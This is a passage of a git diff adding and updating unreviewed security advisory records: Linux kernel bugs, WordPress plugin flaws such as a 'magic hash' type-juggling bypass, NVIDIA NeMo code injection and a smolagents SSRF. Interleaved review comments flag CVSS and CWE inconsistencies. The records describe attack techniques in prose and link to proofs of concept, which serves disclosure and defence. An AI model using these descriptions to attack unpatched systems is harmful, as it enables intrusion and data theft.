This should have a minimal effect on code generation overall\nas it should be rare for the compiler to want to make RDI/RSI live\nacross hypercalls.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23215" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2687c848e57820651b9f69d30c4710f4219f7dbf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f467a92df61eb516a4ec36ee16234dd4e5ccf00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/feb603a69f830acb58f78d604f0c29e63cd38f87" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json new file mode 100644 index 0000000000000..fb67f20527cec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcr4-23wm-438x", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-2386" + ], + "details": "The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 6.4.7. This is due to the tpae_create_page() AJAX handler authorizing users only with current_user_can('edit_posts') while accepting a user-controlled 'post_type' value passed directly to wp_insert_post() without post-type-specific capability checks. This makes it possible for authenticated attackers, with Author-level access and above, to create arbitrary draft posts for restricted post types (e.g., 'page' and 'nxt_builder') via the 'post_type' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2386" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463156/the-plus-addons-for-elementor-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fc3e24a-8b51-4b6f-bacf-665ceb03bc05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json index 2f46e7efbfcc7..6afefb367e23a 100644 --- a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json +++ b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ghfm-hghj-9j75", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-69806" ], "details": "p2r3 bareiron commit: 8e4d4020d contains an Out-of-bounds Read, which allows unauthenticated remote attackers to get relative information leakage via a packet sent to the server", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json new file mode 100644 index 0000000000000..a8f98507e8d9f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h85r-3jrw-9546", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23213" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Disable MMIO access during SMU Mode 1 reset\n\nDuring Mode 1 reset, the ASIC undergoes a reset cycle and becomes\ntemporarily inaccessible via PCIe. Any attempt to access MMIO registers\nduring this window (e.g., from interrupt handlers or other driver threads)\ncan result in uncompleted PCIe transactions, leading to NMI panics or\nsystem hangs.\n\nTo prevent this, set the `no_hw_access` flag to true immediately after\ntriggering the reset. This signals other driver components to skip\nregister accesses while the device is offline.\n\nA memory barrier `smp_mb()` is added to ensure the flag update is\nglobally visible to all cores before the driver enters the sleep/wait\nstate.\n\n(cherry picked from commit 7edb503fe4b6d67f47d8bb0dfafb8e699bb0f8a4)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23213" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0de604d0357d0d22cbf03af1077d174b641707b6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c1853ebbec980d5c05d431bfd6ded73b1363fd00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cd7ff7fd3e4b77f0b5a292e0926532eaa07c5162" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json index a8930d6998337..c464106558174 100644 
--- a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json +++ b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json new file mode 100644 index 0000000000000..2ed94c898f5de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json 
@@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hr98-gm7c-926r", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71225" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: suspend array while updating raid_disks via sysfs\n\nIn raid1_reshape(), freeze_array() is called before modifying the r1bio\nmemory pool (conf->r1bio_pool) and conf->raid_disks, and\nunfreeze_array() is called after the update is completed.\n\nHowever, freeze_array() only waits until nr_sync_pending and\n(nr_pending - nr_queued) of all buckets reaches zero. When an I/O error\noccurs, nr_queued is increased and the corresponding r1bio is queued to\neither retry_list or bio_end_io_list. As a result, freeze_array() may\nunblock before these r1bios are released.\n\nThis can lead to a situation where conf->raid_disks and the mempool have\nalready been updated while queued r1bios, allocated with the old\nraid_disks value, are later released. Consequently, free_r1bio() may\naccess memory out of bounds in put_all_bios() and release r1bios of the\nwrong size to the new mempool, potentially causing issues with the\nmempool as well.\n\nSince only normal I/O might increase nr_queued while an I/O error occurs,\nsuspending the array avoids this issue.\n\nNote: Updating raid_disks via ioctl SET_ARRAY_INFO already suspends\nthe array. 
Therefore, we suspend the array when updating raid_disks\nvia sysfs to avoid this issue too.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0107b18cd8ac17eb3e54786adc05a85cdbb6ef22" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/165d1359f945b72c5f90088f60d48ff46115269e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2cc583653bbe050bacd1cadcc9776d39bf449740" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json new file mode 100644 index 0000000000000..7228d86753e3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvjw-vp7g-39h5", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-33253" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33253" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json new file mode 100644 index 0000000000000..86315bba8ad57 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json 
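Review bot: The CVSS vector in GHSA-hvjw-vp7g-39h5 carries `UI:N`, while `details` says the attack works "by convincing a user to load a maliciously crafted file", which describes required user interaction. The two disagree, and the base score behind `"severity": "HIGH"` depends on which is right. Before this record leaves `unreviewed`, the vector should be checked against the NVIDIA bulletin in `references`; if the description is accurate, the metric would be `UI:R`. A similar tension between "remote code execution" in the text and `AV:L` in the vector appears in other NeMo records of this commit (GHSA-933h-c422-j33j, GHSA-fqmg-pv5x-v55p).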
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9p7-7ww6-3mjx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33249" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33249" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33249" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json new file mode 100644 index 0000000000000..f6b45d7ec529b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json 
@@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfq5-qg8x-7rmp", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23216" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: iscsi: Fix use-after-free in iscsit_dec_conn_usage_count()\n\nIn iscsit_dec_conn_usage_count(), the function calls complete() while\nholding the conn->conn_usage_lock. As soon as complete() is invoked, the\nwaiter (such as iscsit_close_connection()) may wake up and proceed to free\nthe iscsit_conn structure.\n\nIf the waiter frees the memory before the current thread reaches\nspin_unlock_bh(), it results in a KASAN slab-use-after-free as the function\nattempts to release a lock within the already-freed connection structure.\n\nFix this by releasing the spinlock before calling complete().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23216" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/275016a551ba1a068a3bd6171b18611726b67110" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3835e49e146a4e6e7787b29465f1a23379b6ec44" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48fe983e92de2c59d143fe38362ad17ba23ec7f3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73b487d44bf4f92942629d578381f89c326ff77f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8518f072fc92921418cd9ed4268dd4f3e9a8fd75" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9411a89e9e7135cc459178fa77a3f1d6191ae903" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba684191437380a07b27666eb4e72748be1ea201" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at 
end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json new file mode 100644 index 0000000000000..d4eebd331c726 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json 
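Review bot: GHSA-jfq5-qg8x-7rmp is added with `"cwe_ids": []` and `"severity": null`, although `details` names the bug class outright: a KASAN slab-use-after-free in iscsit_dec_conn_usage_count(). Until NVD analysis fills these in, tooling that triages by CWE or severity may not surface this record. I would set `"cwe_ids": ["CWE-416"]` now and leave `severity` unset until a vector is published. The same applies to other kernel records in this commit whose description names the flaw, for example the out-of-bounds access described in GHSA-hr98-gm7c-926r.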
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jxgv-6j54-wwc7",
+ "modified": "2026-02-18T15:31:26Z",
+ "published": "2026-02-18T15:31:26Z",
+ "aliases": [
+ "CVE-2026-2654"
+ ],
+ "details": "A weakness has been identified in huggingface smolagents 1.24.0. Impacted is the function requests.get/requests.post of the component LocalPythonExecutor. Executing a manipulation can lead to server-side request forgery. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2654"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CH0ico/CVE_choco_smolagent/blob/main/report.md#proof-of-concept-execution"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CH0ico/CVE_choco_smolagent/tree/main"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346451"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346451"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752774"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T14:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json
new file mode 100644
index 0000000000000..a480dfcae2b72
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m8v3-m8mg-rrc7",
+ "modified": "2026-02-18T15:31:27Z",
+ "published": "2026-02-18T15:31:27Z",
+ "aliases": [
+ "CVE-2026-23211"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm, swap: restore swap_space attr aviod kernel panic\n\ncommit 8b47299a411a (\"mm, swap: mark swap address space ro and add context\ndebug check\") made the swap address space read-only. It may lead to\nkernel panic if arch_prepare_to_swap returns a failure under heavy memory\npressure as follows,\n\nel1_abort+0x40/0x64\nel1h_64_sync_handler+0x48/0xcc\nel1h_64_sync+0x84/0x88\nerrseq_set+0x4c/0xb8 (P)\n__filemap_set_wb_err+0x20/0xd0\nshrink_folio_list+0xc20/0x11cc\nevict_folios+0x1520/0x1be4\ntry_to_shrink_lruvec+0x27c/0x3dc\nshrink_one+0x9c/0x228\nshrink_node+0xb3c/0xeac\ndo_try_to_free_pages+0x170/0x4f0\ntry_to_free_pages+0x334/0x534\n__alloc_pages_direct_reclaim+0x90/0x158\n__alloc_pages_slowpath+0x334/0x588\n__alloc_frozen_pages_noprof+0x224/0x2fc\n__folio_alloc_noprof+0x14/0x64\nvma_alloc_zeroed_movable_folio+0x34/0x44\ndo_pte_missing+0xad4/0x1040\nhandle_mm_fault+0x4a4/0x790\ndo_page_fault+0x288/0x5f8\ndo_translation_fault+0x38/0x54\ndo_mem_abort+0x54/0xa8\n\nRestore swap address space as not ro to avoid the panic.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23211"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/a0f3c0845a4ff68d403c568266d17e9cc553e561"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/b0020cbd26380177b9fb8b7e75a8f7bdba79db20"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:42Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json
new file mode 100644
index 0000000000000..f20f485158a3d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mx8g-qc6m-wcmf",
+ "modified": "2026-02-18T15:31:27Z",
+ "published": "2026-02-18T15:31:27Z",
+ "aliases": [
+ "CVE-2026-23218"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: loongson-64bit: Fix incorrect NULL check after devm_kcalloc()\n\nFix incorrect NULL check in loongson_gpio_init_irqchip().\nThe function checks chip->parent instead of chip->irq.parents.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23218"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/e34f77b09080c86c929153e2a72da26b4f8947ff"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/e71e3fa90a15134113f61343392e887cd1f4bf7c"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T15:18:43Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json
new file mode 100644
index 0000000000000..ebb7bcea28c29
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p4q3-g549-vvfc",
+ "modified": "2026-02-18T15:31:25Z",
+ "published": "2026-02-18T15:31:25Z",
+ "aliases": [
+ "CVE-2026-1582"
+ ],
+ "details": "The WP All Export plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.14 via the export download endpoint. This is due to a PHP type juggling vulnerability in the security token comparison which uses loose comparison (==) instead of strict comparison (===). This makes it possible for unauthenticated attackers to bypass authentication using \"magic hash\" values when the expected MD5 hash prefix happens to be numeric-looking (matching pattern ^0e\\d+$), allowing download of sensitive export files containing PII, business data, or database information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1582"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-all-export/tags/1.4.14/actions/wp_loaded.php#L19"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3455775"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a92c682-b8b3-4d23-bd84-97d7440ee525?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T13:16:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json
index 2d40cf4763f91..edb136c8f66c1 100644
--- a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json
+++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pc38-57g8-39gg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-69752" ], "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T16:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json new file mode 100644 index 0000000000000..4bcf8b83f90d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json 
@@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqg-p332-q7vc", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23212" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: annotate data-races around slave->last_rx\n\nslave->last_rx and slave->target_last_arp_rx[...] can be read and written\nlocklessly. Add READ_ONCE() and WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in bond_rcv_validate / bond_rcv_validate\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 1:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n...\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 0:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n br_netif_receive_skb net/bridge/br_input.c:30 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n...\n\nvalue changed: 0x0000000100005365 -> 0x0000000100005366", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23212" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c0be3277e7aefb2f900fc37ca3fe7df362e26f5" + }, + { + "type": "WEB", + "url": 
"https://git.kernel.org/stable/c/a7516cb0165926d308187e231ccd330e5e3ebff7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b956289b83887e0a306067b6003c3fcd81bfdf84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd98324e327e41de04b13e372cc16f73150df254" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f6c3665b6dc53c3ab7d31b585446a953a74340ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json index 0242e02b8a189..d7850968c5787 100644 --- a/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json +++ b/advisories/unreviewed/2026/02/GHSA-q543-x74m-r8q9/GHSA-q543-x74m-r8q9.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-918" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json new file mode 100644 index 0000000000000..8039ad0742203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json 
